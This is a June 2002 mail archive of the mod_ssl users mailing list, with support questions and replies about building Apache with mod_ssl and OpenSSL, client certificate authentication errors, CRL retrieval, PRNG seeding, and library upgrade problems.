RSAREF is no longer being used or required.
> + openssl-0.9.7-stable-SNAP-20020529
> + mm-1.1.3
> + mod_ssl-2.8.8-1.3.24
> + apache-1.3.24
> 
> When compiling apache with these ingredients I get:
> 
> /include -DMOD_SSL_VERSION=\"2.8.8\" ssl_engine_vars.c && mv 
> ssl_engine_vars.o ssl_engine_vars.lo
> ssl_engine_vars.c:410: `NID_uniqueIdentifier' undeclared here (not in a 
> function)

The OpenSSL developers are aware of this problem. It is created by
uniqueIdentifier not being the correct name of the OID (object
identifier). The correct OID is X500UniqueIdentifier (thus leading
to NID_X500UniqueIdentifier being available instead).
The name change was required in order to become compatible to
the LDAP scheme defined in RFC2253.
However: as you already found out, it breaks compatibility.

We have not yet decided about what to do about this problem.
Unfortunately UniqueIdentifier was already used for another OID
in RFC1274 (that is however currently disabled in OpenSSL), so
that it does not make sense for OpenSSL to simply leave things
as they were...

For a more complete discussion of this item please check out the
OpenSSL request tracker
 http://www.openssl.org/support/rt2/
 http://www.aet.tu-cottbus.de/rt2/NoAuth/Buglist.html
and more specifically Ticket #82
 http://www.aet.tu-cottbus.de/rt2/Ticket/Display.html?id=82
(guest account is "guest"/"guest").

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 12:27:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA29441; Fri, 7 Jun 2002 12:26:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mel-rto4.wanadoo.fr id MAA29437; Fri, 7 Jun 2002 12:26:08 +0200 (MET DST)
Received: from mel-rta9.wanadoo.fr (193.252.19.69) by mel-rto4.wanadoo.fr (6.5.007)
        id 3CFF7E0900070D3E for modssl-users@modssl.org; Fri, 7 Jun 2002 12:26:01 +0200
Received: from fdesar (217.128.211.68) by mel-rta9.wanadoo.fr (6.5.007)
        id 3CFB286C002C3D69 for modssl-users@modssl.org; Fri, 7 Jun 2002 12:26:01 +0200
Date: Fri, 7 Jun 2002 12:26:00 +0200
From: François Désarménien 
To: modssl-users@modssl.org
Subject: Getting CRL from CA
Message-Id: <20020607122600.49347cf1.francois@fdesar.net>
X-Mailer: Sylpheed version 0.6.4 (GTK+ 1.2.10; i686-pc-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: François Désarménien 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

Maybe a stupid question, but I cannot figure out the answer.

I have a secured SSL/TLS server with client authentication.
I accept user certificates for various CA of my choice, so
I have those CA certificates available and verified, etc.

But, in order to validate user certificates, I need to
update the various CRL from those CA.

Is there a standard way of knowing where and how to connect
to get those CRL, beside reviewing individually for each
CA its CPS ?

Another question strongly related to this one : is there
any opensource tools to achieve thios goal available to
your knowledge ?

Thank you for your time,

François
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 12:33:25 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA29738; Fri, 7 Jun 2002 12:32:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id MAA29728; Fri, 7 Jun 2002 12:32:08 +0200 (MET DST)
Message-Id: <200206071032.MAA29728@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Fri, 07 Jun 2002 15:01:04 +0530
Date: Fri, 07 Jun 2002 15:00:54 +0530
From: "Prachait Saxena" 
To: modssl-users@modssl.org
Subject: Re: [BugDB] Error Starting Apache when trying to use mod_ssl
	(PR#712)
X-Mailer: WorldClient 5.0.5
In-Reply-To: <200206060239.EAA11229@opensource.ee.ethz.ch>
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


I also have excatly same problem...

Prachait Saxena

-----Original Message-----
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Date: Thu, 6 Jun 2002 04:39:06 +0200 (MET DST)
Subject: [BugDB] Error Starting Apache when trying to use mod_ssl (PR#712)

> Full_Name: Luke Whitford
> Version: 2.8.8
> OS: Win98
> Submission from: (NULL) (203.59.68.234)
> 
> 
> When trying to start apache (1.3.24) with the mod_ssl module being
> loaded the
> following error occurs:
> 
> C:\Program Files\Apache Group\Apache>apache
> Syntax error on line 195 of c:/program files/apache
> group/apache/conf/httpd.conf
> :
> Cannot load c:/program files/apache group/apache/modules/mod_ssl.so
> into
> server:
>  (31) A device attached to the system is not functioning:
> 
> Note the errors or messages above, and press the  key to exit. 
> 0....
> 
> Any ideas on how to remedy the situation would be greatly appreciated
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 13:02:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id NAA01468; Fri, 7 Jun 2002 13:01:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from unipmn.it id NAA01427; Fri, 7 Jun 2002 13:00:08 +0200 (MET DST)
Received: from mfn.unipmn.it (localhost [127.0.0.1])
	by unipmn.it (8.11.6+Sun/upo-1.5) with ESMTP id g57Axtc20695
	for ; Fri, 7 Jun 2002 12:59:57 +0200 (MEST)
Message-ID: <3D00922B.72892661@mfn.unipmn.it>
Date: Fri, 07 Jun 2002 12:59:55 +0200
From: Lavinia Egidi 
X-Mailer: Mozilla 4.78 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: X509v3 Basic Constraints
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lavinia Egidi 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
does anybody know whether there is an Apache+mod_ssl variable whose
value is the Basic Constraints extension field of the client
certificate?
Thanks,
Lavinia Egidi
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 15:03:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA06241; Fri, 7 Jun 2002 15:02:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from orion.it-sec.de id PAA06217; Fri, 7 Jun 2002 15:01:21 +0200 (MET DST)
Received: by orion.ibh.de with Internet Mail Service (5.5.2653.19)
	id ; Fri, 7 Jun 2002 14:58:42 +0200
Message-ID: 
From: Jochen Vogel 
To: "'modssl-users@modssl.org'" 
Subject: AW: Client Authentication Problem
Date: Fri, 7 Jun 2002 14:58:32 +0200 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id PAA06237
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jochen Vogel 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

the path for SSLCACertificateFile was wrong.
know its working

> -----Ursprüngliche Nachricht-----
> Von: Jochen Vogel [mailto:jvogel@it-sec.de]
> Gesendet: Donnerstag, 6. Juni 2002 13:14
> An: 'modssl-users@modssl.org'
> Betreff: Client Authentication Problem
> 
> 
> hi,
> 
> i created a CA and a ClientKey witch i imported in my Client.
> in httpd.conf i configured
> 
> Alias /test/ "/opt/www/test/"
>     
>         Options Indexes 
>         Order allow,deny
>         Allow from 192.168.0.142
>         SSLVerifyClient require
>         SSLVerifyDepth 1
>      
> if i try to connect i get the following error.
> 
> ==> ./logs/ssl_engine_log <==
> [06/Jun/2002 13:04:06 01186] [info]  Connection to child 5 established
> (server suse:443, client 192.168.0.142)
> [06/Jun/2002 13:04:06 01186] [info]  Seeding PRNG with 23177 bytes of
> entropy
> [06/Jun/2002 13:04:06 01186] [info]  Connection: Client IP: 
> 192.168.0.142,
> Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits)
> [06/Jun/2002 13:04:06 01186] [info]  Connection to child 5 closed with
> standard shutdown (server suse:443, client 192.168.0.142)
> 
> ==> ./logs/access_log <==
> 192.168.0.142 - - [06/Jun/2002:13:04:07 +0200] "GET /test/ 
> HTTP/1.1" 403 265
> 
> ==> ./logs/error_log <==
> [Thu Jun  6 13:04:07 2002] [error] mod_ssl: Re-negotiation 
> handshake failed:
> Not accepted by client!?
> [Thu Jun  6 13:04:07 2002] [error] mod_ssl: SSL error on writing data
> (OpenSSL library error follows)
> [Thu Jun  6 13:04:07 2002] [error] OpenSSL: error:1409E0E5:SSL
> routines:SSL3_WRITE_BYTES:ssl handshake failure
> 
> ==> ./logs/ssl_engine_log <==
> [06/Jun/2002 13:04:07 01187] [info]  Connection to child 6 established
> (server suse:443, client 192.168.0.142)
> [06/Jun/2002 13:04:07 01187] [info]  Seeding PRNG with 23177 bytes of
> entropy
> [06/Jun/2002 13:04:07 01187] [info]  Connection: Client IP: 
> 192.168.0.142,
> Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits)
> [06/Jun/2002 13:04:07 01187] [info]  Initial (No.1) HTTPS 
> request received
> for child 6 (server suse:443)
> [06/Jun/2002 13:04:07 01187] [info]  Requesting connection 
> re-negotiation
> [06/Jun/2002 13:04:07 01187] [info]  Awaiting re-negotiation handshake
> [06/Jun/2002 13:04:07 01187] [error] Re-negotiation handshake 
> failed: Not
> accepted by client!?
> [06/Jun/2002 13:04:07 01187] [error] SSL error on writing 
> data (OpenSSL
> library error follows)
> [06/Jun/2002 13:04:07 01187] [error] OpenSSL: error:1409E0E5:SSL
> routines:SSL3_WRITE_BYTES:ssl handshake failure
> [06/Jun/2002 13:04:07 01187] [info]  Connection to child 6 closed with
> unclean shutdown (server suse:443, client 192.168.0.142)
> 
> ==> ./logs/ssl_request_log <==
> [06/Jun/2002:13:04:07 +0200] 192.168.0.142 SSLv3 (NONE) "GET /test/
> HTTP/1.1" 265
> 
> ==> ./logs/access_log <==
> 192.168.0.142 - - [06/Jun/2002:13:04:09 +0200] "GET /test/ 
> HTTP/1.1" 403 265
> 
> ==> ./logs/error_log <==
> [Thu Jun  6 13:04:09 2002] [error] mod_ssl: Certificate 
> Verification: Error
> (20): unable to get local issuer certificate
> [Thu Jun  6 13:04:09 2002] [error] mod_ssl: Re-negotiation 
> handshake failed:
> Not accepted by client!?
> [Thu Jun  6 13:04:09 2002] [error] mod_ssl: Certificate 
> Verification: Error
> (20): unable to get local issuer certificate
> [Thu Jun  6 13:04:09 2002] [error] mod_ssl: SSL error on writing data
> (OpenSSL library error follows)
> [Thu Jun  6 13:04:09 2002] [error] OpenSSL: error:140890B2:SSL
> routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
> 
> ==> ./logs/ssl_engine_log <==
> [06/Jun/2002 13:04:09 01188] [info]  Connection to child 7 established
> (server suse:443, client 192.168.0.142)
> [06/Jun/2002 13:04:09 01188] [info]  Seeding PRNG with 23177 bytes of
> entropy
> [06/Jun/2002 13:04:09 01188] [info]  Connection: Client IP: 
> 192.168.0.142,
> Protocol: SSLv3, Cipher: EXP-RC4-MD5 (40/128 bits)
> [06/Jun/2002 13:04:09 01188] [info]  Initial (No.1) HTTPS 
> request received
> for child 7 (server suse:443)
> [06/Jun/2002 13:04:09 01188] [info]  Requesting connection 
> re-negotiation
> [06/Jun/2002 13:04:09 01188] [info]  Awaiting re-negotiation handshake
> [06/Jun/2002 13:04:09 01188] [error] Certificate 
> Verification: Error (20):
> unable to get local issuer certificate
> [06/Jun/2002 13:04:09 01188] [error] Re-negotiation handshake 
> failed: Not
> accepted by client!?
> [06/Jun/2002 13:04:09 01188] [error] Certificate 
> Verification: Error (20):
> unable to get local issuer certificate
> [06/Jun/2002 13:04:09 01188] [error] SSL error on writing 
> data (OpenSSL
> library error follows)
> [06/Jun/2002 13:04:09 01188] [error] OpenSSL: error:140890B2:SSL
> routines:SSL3_GET_CLIENT_CERTIFICATE:no certificate returned
> [06/Jun/2002 13:04:09 01188] [info]  Connection to child 7 closed with
> unclean shutdown (server suse:443, client 192.168.0.142)
> 
> ==> ./logs/ssl_request_log <==
> [06/Jun/2002:13:04:09 +0200] 192.168.0.142 SSLv3 (NONE) "GET /test/
> HTTP/1.1" 265
> 
> thx for help
> Jochen
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 15:05:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA06559; Fri, 7 Jun 2002 15:04:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from huggins.bsd.uchicago.edu id PAA06491; Fri, 7 Jun 2002 15:04:01 +0200 (MET DST)
Received: from bmimac26.bsd.uchicago.edu (bmimac26.bsd.uchicago.edu [128.135.182.36])
	by huggins.bsd.uchicago.edu (8.12.4/8.12.4) with ESMTP id g57Cx3Zj006189;
	Fri, 7 Jun 2002 07:59:03 -0500 (CDT)
Message-Id: <5.1.0.14.2.20020607200529.02b54d38@huggins.bsd.uchicago.edu>
X-Sender: imiller@huggins.bsd.uchicago.edu
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Fri, 07 Jun 2002 20:08:47 -0500
To: modssl-users@modssl.org, 
From: Ian Miller 
Subject: Re: Newbie with RANDFILE
In-Reply-To: <002301c20da5$4f300ff0$4329f99f@edsasc3k6e5h73>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ian Miller 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

They have a path for solaris 8 that adds /dev/random now    just for info
Patch #  112438-01

At 03:58 PM 6/6/2002 -0600, Tim Pushor wrote:
>Wow, it says right in your error output:
>
> > 10175:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not
>seeded:md_rand.c:501:You need to read the OpenSSL FAQ,
>http://www.openssl.org/support/faq.html
>
>And from the FAQ [USER] Section 1:
>
>Pointing $RANDFILE to an Entropy Gathering Daemon socket does not work. Use
>the "-rand" option of the OpenSSL command line tools instead.
>
>----- Original Message -----
>From: "Jeff Landers" 
>To: 
>Sent: Thursday, June 06, 2002 3:36 PM
>Subject: Newbie with RANDFILE
>
>
> > OK, I give up. What am I doing wrong? Apache 2.036 trying to on Solaris 8.
>Everything seems fine during install. egd working. Random file is
>/var/spool/prngd/pool. Pointed the RANDFILE at the file in openssl.conf. but
>keep getting the following.
> >
> > I searched the archives but no luck.
> >
> > ./CA.sh -newca
> >
> > Making CA certificate ...
> > Using configuration from /usr/local/ssl/openssl.cnf
> > unable to load 'random state'
> > This means that the random number generator has not been seeded
> > with much random data.
> > Consider setting the RANDFILE environment variable to point at a file that
> > 'random' data can be kept in (the file will be overwritten).
> > Generating a 1024 bit RSA private key
> > 10175:error:24064064:random number generator:SSLEAY_RAND_BYTES:PRNG not
>seeded:md_rand.c:501:You need to read the OpenSSL FAQ,
>http://www.openssl.org/support/faq.html
> > 10175:error:04069003:rsa routines:RSA_generate_key:BN lib:rsa_gen.c:182:
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

Ian Miller
BSD/IS-BMI Computing
Sr. System Engineer
University of Chicago
imiller@bsd.uchicago.edu

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 15:28:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA07502; Fri, 7 Jun 2002 15:27:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.comcast.net id PAA07476; Fri, 7 Jun 2002 15:26:04 +0200 (MET DST)
Received: from LAPTOP (pcp01312828pcs.nrockv01.md.comcast.net [68.50.239.125])
 by mtaout03.icomcast.net
 (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002))
 with SMTP id <0GXC00LKO7T4GA@mtaout03.icomcast.net> for
 modssl-users@modssl.org; Fri, 07 Jun 2002 09:22:16 -0400 (EDT)
Date: Fri, 07 Jun 2002 09:22:16 -0400
From: John Wagner 
Subject: RE: [BugDB] Error Starting Apache when trying to use mod_ssl(PR#712)
In-reply-to: <200206071032.MAA29728@opensource.ee.ethz.ch>
To: modssl-users@modssl.org
Message-id: 
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
Importance: Normal
X-Priority: 3 (Normal)
X-MSMail-priority: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John Wagner 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

It looks like you are installing on a Windows platform.  I had the same
problem.  Then I remembered that I had not overwritten my Apache files with
the one that came as a part of the mod_ssl distribution for Windows.  Check
the "Apache+SSL Win32 HOWTO.html" document, section 4.
jw
John Wagner
*** Carpe Diem Before the Diem Carpes You! ***


-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Prachait Saxena
Sent: Friday, June 07, 2002 5:31 AM
To: modssl-users@modssl.org
Subject: Re: [BugDB] Error Starting Apache when trying to use
mod_ssl(PR#712)



I also have excatly same problem...

Prachait Saxena

-----Original Message-----
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Date: Thu, 6 Jun 2002 04:39:06 +0200 (MET DST)
Subject: [BugDB] Error Starting Apache when trying to use mod_ssl (PR#712)

> Full_Name: Luke Whitford
> Version: 2.8.8
> OS: Win98
> Submission from: (NULL) (203.59.68.234)
>
>
> When trying to start apache (1.3.24) with the mod_ssl module being
> loaded the
> following error occurs:
>
> C:\Program Files\Apache Group\Apache>apache
> Syntax error on line 195 of c:/program files/apache
> group/apache/conf/httpd.conf
> :
> Cannot load c:/program files/apache group/apache/modules/mod_ssl.so
> into
> server:
>  (31) A device attached to the system is not functioning:
>
> Note the errors or messages above, and press the  key to exit.
> 0....
>
> Any ideas on how to remedy the situation would be greatly appreciated
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 15:47:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA08119; Fri, 7 Jun 2002 15:46:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id PAA08114; Fri, 7 Jun 2002 15:46:04 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4484E4CE73A; Fri,  7 Jun 2002 15:46:04 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AB8D62865C; Fri,  7 Jun 2002 15:42:07 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id MAA29969; Fri, 7 Jun 2002 12:35:16 +0200 (MET DST)
Date: Fri, 7 Jun 2002 12:35:16 +0200 (MET DST)
Message-Id: <200206071035.MAA29969@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Errors on log file and IE5.5+ gets errors when conneting to my Apache site. (PR#714)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Victoria
Version: 
OS: Dynix-ptx
Submission from: (NULL) (196.23.192.242)


I am though getting a lot of errors in our log files.  Please see also the error
that Internet Explorer 5.5 + gives when accessing the site.
 
Any help in this regard would be appreciated.
 
Below are three of the more common errors that appear in the error log:
 
[Mon Apr 22 13:27:37 2002] [error] OpenSSL: error:1408A0C1:SSL
routines:SSL3_GET_CLIENT_HELLO:no shared cipher [Hint: Too restrictive
SSLCipherSuite or using DSA server certificate?]

[Mon Apr 22 12:44:07 2002] [error] OpenSSL: error:14094412:SSL
routines:SSL3_READ_BYTES:sslv3 alert bad certificate [Hint: Subject CN in
certificate not server name or identical to CA!?]

[Mon Apr 22 13:28:42 2002] [error] mod_ssl: SSL handshake interrupted by system
[Hint: Stop button pressed in browser?!] (System error follows)
[Mon Apr 22 13:28:42 2002] [error] System: Connection reset by peer (errno:
131)


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 20:16:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA22718; Fri, 7 Jun 2002 20:15:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SCIDALSMTP01.stercomm.com id UAA22615; Fri, 7 Jun 2002 20:14:22 +0200 (MET DST)
Received: from scidalxcn01.csg.stercomm.com (not verified[10.20.32.47]) by SCIDALSMTP01.stercomm.com with MailMarshal (4,2,5,0) 
	id ; Fri, 07 Jun 2002 13:13:48 -0500
Received: by scidalxcn01.csg.stercomm.com with Internet Mail Service (5.5.2653.19)
	id ; Fri, 7 Jun 2002 13:15:37 -0500
Message-ID: <40AC2C8FB855D411AE0200D0B7458B2B08C75439@scidalmsg01.csg.stercomm.com>
From: "Ikonne, Ike" 
To: "'modssl-users@modssl.org'" 
Subject: Mod_ssl on Windows Operating system (NT or 2000)
Date: Fri, 7 Jun 2002 13:14:20 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ikonne, Ike" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi all,

I am a new memeber to this group.  I have a question which someone might
have asked in the
past, so forgive me if my questions had already been asked before.

Here is the deal, I maintain apache webservers on Microsoft operating
systems (NT, 2000, XP).  
I would like to install mod_ssl and the cryptographic module from Open_SSL,
my question are
these:

How could I  build mod_ssl on NT or 2000
How could I buid the Open_SSL modules on NT or 2000

OR

Is there a site that I can download already built versions of these software
components.
I would appreciate any help that the community could offer to me.


Thanks,


Ike Ikonne
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 22:47:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00127; Fri, 7 Jun 2002 22:46:26 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mm02snlnto.sandia.gov id WAA00098; Fri, 7 Jun 2002 22:45:55 +0200 (MET DST)
Received: from 132.175.109.4 by mm02snlnto.sandia.gov with ESMTP (
 Tumbleweed MMS SMTP Relay (MMS v4.7)); Fri, 07 Jun 2002 14:44:05 -0600
X-Server-Uuid: 95b8ca9b-fe4b-44f7-8977-a6cb2d3025ff
Received: from es08snlnt.sandia.gov (es08snlnt.sandia.gov
 [134.253.130.11]) by mailgate2.sandia.gov (8.12.3/8.12.3) with ESMTP id
 g57Kjp2B025686 for ; Fri, 7 Jun 2002 14:45:51
 -0600 (MDT)
Received: by es08snlnt.sandia.gov with Internet Mail Service (
 5.5.2653.19) id ; Fri, 7 Jun 2002 14:45:51 -0600
Message-ID: 
From: "Ashmore, Samuel R" 
To: "'modssl-users@modssl.org'" 
Subject: authencation
Date: Fri, 7 Jun 2002 14:45:50 -0600
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
X-Filter-Version: 1.8 (sass2426)
X-WSS-ID: 111FC49F407203-01-01
Content-Type: text/plain; 
 charset=iso-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ashmore, Samuel R" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

After a user passes the certificate test and i want to transfer the CN to
Remote USer how would i do that

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  7 22:50:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00268; Fri, 7 Jun 2002 22:49:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00242; Fri, 7 Jun 2002 22:48:23 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id BE0D44CE73A; Fri,  7 Jun 2002 22:48:22 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 002FE28968; Fri,  7 Jun 2002 22:37:24 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost.localdomain id VAA26180; Fri, 7 Jun 2002 21:16:02 +0200 (MET DST)
From: ben@foundmoney.com
Received: from foundmoney.com (cdnetbmai0002 [127.0.0.1])
	by localhost.localdomain (8.11.6/8.11.6) with SMTP id g57J9xv21909
	for modssl-users@modssl.org; Fri, 7 Jun 2002 15:09:59 -0400
Message-Id: <200206071909.g57J9xv21909@localhost.localdomain>
Date: Fri, 7 Jun 2002 19:09:59 -0000
To: 
Subject: RHL7.0 with openssl0.9.5a & 0.9.6
X-Mailer: TWIG 2.4.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ben@foundmoney.com
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just upgraded my openssl and the sent a SIGHUP to httpd and I got the 
following error:

Syntax error on line 265 of /etc/httpd/conf/httpd.conf:
Cannot load /etc/httpd/modules/libssl.so into server: symbol __sysconf, 
version GLIBC_2.2 not defined in file libc.so.6 with link time reference

The system is running RHL7.0. Before upgrade everything was working fine 
(including SSL module). We had openssl-0.9.5a-14 installed.

Then for upgrade I performed the following:
rpm -ivh --force openssl095a-0.9.5a-9.i386.rpm
rpm -Uvh --force openssl-0.9.6-9.i386.rpm

(for your info: openssl095a is the same as openssl-0.9.5a just different 
names, they include the same files so you can have both 0.9.5a and 0.9.6 
installed at the same time. it's an RPM versioning issue)

So in the /usr/lib directory there is libssl.so.0 and libssl.so.1 (this is 
compatibility for other programs). But now on restart of httpd I received the 
following error.

Anybody have ideas?

Thanks,
Ben
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

